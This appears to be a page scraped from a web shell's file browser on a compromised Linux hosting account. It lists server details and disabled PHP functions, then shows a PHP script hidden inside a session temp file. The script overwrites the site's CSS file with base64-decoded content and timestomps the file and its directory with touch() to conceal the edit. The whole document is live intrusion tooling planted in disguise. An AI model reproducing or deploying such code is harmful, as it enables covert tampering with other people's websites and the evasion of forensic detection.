HEX
Server: Apache/2
System: Linux server.winterserver.com 4.18.0 #1 SMP Wed Jul 12 12:00:44 MSK 2023 x86_64
User: hotjamba (1034)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/hotjamba/tmp/sess_1931df25a141b08f87dc7c53e1f45951
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$filepath = "/home/hotjamba/domains/hotjamband.com/private_html/hotjamband.com.css"; $dirpath = @dirname($filepath); $tm = @filemtime($filepath);$mf = @fopen($filepath, "w"); if ($mf) { $txt = base64_decode("NzNhMTBlYjE5NDRhMzA0Y2RiYjUwZDczNTg0ZjJiOGE="); fwrite($mf, $txt); fclose($mf); print("<div>Edited!</div>\n<br>"); } if(file_exists($filepath)) { $txt = file_get_contents($filepath); print("<textarea>$txt</textarea>"); if($tm) { @touch($filepath,$tm,$tm); @touch($dirpath,$tm,$tm); } };echo "Result:OK"; echo "</body></html>";  die;